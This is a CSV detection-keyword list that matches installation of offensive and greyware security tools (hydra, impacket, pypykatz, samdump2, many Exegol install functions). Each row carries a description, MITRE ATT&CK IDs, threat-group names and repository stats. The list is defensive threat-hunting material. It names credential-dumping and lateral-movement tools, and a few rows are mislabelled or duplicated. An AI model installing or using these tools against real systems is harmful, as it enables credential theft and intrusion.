-*install hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z
-*install hping3*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z
-*install hydra-gtk*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z
-*install impacket*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z
-*install Jira-Lens*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,0,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z
-*install macchanger*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,0,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z
-*install p0f*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*install pivotnacci*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z
-*install proxychains*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z
-*install pyinstaller*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*install pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-*install s3scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z
-*install samdump2*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A
-*install smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*install smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*install snmpcheck*,greyware_tool_keyword,snmpcheck,automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,http://www.nothink.org/codes/snmpcheck/index.php,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*install tor deb.torproject.org-keyring*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*install tshark*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*install udmp_parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z
-*install wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-*install_aclpwn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ad_apt_tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_adidnsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_amber*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_bloodhound-import*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_bloodhound-py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_bloodhound-quickwin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_certipy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_certsync*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_coercer*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_crackhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_cracking_apt_tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_crackmapexec*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_cypheroth*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_darkarmour*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_dfscoerce*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_donpapi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_enum4linux-ng*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_enyx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_evilwinrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_finduncommonshares*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_gmsadumper*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_goldencopy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_gosecretsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_gpp-decrypt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_hashonymize*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_impacket*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_keepwn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_kerbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_krbrelayx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ldapdomaindump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ldaprelayscan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ldapsearch-ad*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_lnkup*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_lsassy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_manspider*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_mitm6_pip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_noPac*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ntlmv1-multi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_oaburl*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_PassTheCert*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pcredz*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_petitpotam*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pkinittools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_polenum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_privexchange*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pth-tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pygpoabuse*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pykek*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pylaps*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pypykatz*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
